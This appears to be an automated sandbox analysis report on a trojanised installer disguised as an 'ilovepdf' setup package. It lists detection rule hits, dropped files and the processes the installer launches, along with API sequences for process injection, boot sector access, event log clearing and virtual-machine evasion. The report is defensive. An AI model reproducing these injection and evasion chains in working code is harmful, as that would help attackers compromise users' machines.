Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\3cf0a5.msi
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E178BB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E178BB6A8 appears 40 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E198530B0 appears 33 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000024B7D11B6A8 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00000204F33CB848 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000024B7D11B6B8 appears 32 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19856620 appears 53 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19833D40 appears 38 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000024B7D11B848 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19834D50 appears 129 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00000204F33CB6A8 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00000204F33CB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19834000 appears 149 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E178BB848 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 0060C688 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 00615D14 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 005DD7A8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 005F4B90 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 005F4E74 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 00615A90 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC6740: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle,
Source: MSIFBC3.tmp.10.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-JDQA9.tmp.11.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 6rfyiAq0nM.msi | Binary or memory string: OriginalFileName vs 6rfyiAq0nM.msi
Source: is-93C0J.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.990987760073
Source: is-30MA7.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.990885780988
Source: is-8KFAQ.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.991569422468
Source: is-UKPSI.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.991049810131
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Users\user\AppData\Local\Programs
Source: classification engine | Classification label: mal74.troj.spyw.evad.winMSI@10/39@2/5
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File read: C:\Program Files (x86)\desktop.ini
Source: C:\Windows\Installer\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\Installer\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: 6rfyiAq0nM | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: 6rfyiAq0nM.msi | Virustotal: Detection: 31%
Source: 6rfyiAq0nM.msi | ReversingLabs: Detection: 35%
Source: C:\Windows\Installer\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ECAA70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EDA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F339DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFAE8A96F5E4660E33.TMP
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_0062C764 GetVersion,CoCreateInstance,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0041A4DC GetDiskFreeSpaceW,
Source: svchost.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: 6rfyiAq0nM.msi | Static file information: TRID: Microsoft Windows Installer (77509/1) 90.59%
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Window found: window name: TMainForm
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 6rfyiAq0nM.msi | Static file information: File size 7306752 > 1048576
Source: Binary string: 2"j.pdb source: is-30MA7.tmp.11.dr
Source: Binary string: .pdbYH source: is-UKPSI.tmp.11.dr
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004B5000 push 004B50DEh; ret
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004B5980 push 004B5A48h; ret
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00458000 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0049B03C push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004A00F8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00458084 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004B1084 push 004B10ECh; ret
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004A1094 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0041A0B4 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004270BC push 00427104h; ret
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00458108 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004321C8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004A21D8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0049E1B8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0049A260 push 0049A378h; ret
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00455268 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004252D4 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004592FC push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0045B284 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00430358 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00430370 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00459394 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004A1428 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0049B424 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004A24D8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004224F0 push 004225F4h; ret
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004304F0 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00499490 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00458564 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00458574 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00457574 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: MSIFBC3.tmp.2.dr | Static PE information: section name: .didata
Source: MSIFBC3.tmp.10.dr | Static PE information: section name: .didata
Source: is-JDQA9.tmp.11.dr | Static PE information: section name: .didata
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSIFBC3.tmp
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Windows\System32\svchost.exe | Code function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\is-30MA7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\ti.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\th.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\tt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)
Source: C:\Windows\Installer\MSIFBC3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Windows\System32\svchost.exe | Code function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ilovepdf.lnk
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_006A52B8 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_005C7E30 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EBA010 ClearEventLogW,OpenEventLogA,ClearEventLogW,CloseEventLog,
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5HQ15BTC-BI2Q-S1J7-YRC6-SZJY3C3CP8J7}\650478DC7424C37C 1
Source: C:\Windows\System32\svchost.exe | Registry key monitored for changes: HKEY_USERS.DEFAULT\Control Panel\International
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (14 occurrences)
Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmp | Process information set: NOGPFAULTERRORBOX (3 occurrences)
Source: C:\Windows\Installer\MSIFBC3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process information set: NOGPFAULTERRORBOX (8 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (12 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\svchost.exe | System information queried: FirmwareTableInformation
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,StrStrIW,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle, (2 occurrences)
Source: C:\Windows\System32\svchost.exe | Code function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,FindCloseChangeNotification,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB3C30
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D4410
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17874410
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F3384410
Source: C:\Windows\System32\svchost.exe TID: 6684 | Thread sleep count: 717 > 30
Source: C:\Windows\System32\svchost.exe TID: 6684 | Thread sleep time: -71700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6668 | Thread sleep count: 1082 > 30
Source: C:\Windows\System32\svchost.exe TID: 6668 | Thread sleep time: -14400000s >= -30000s
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed (16 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,
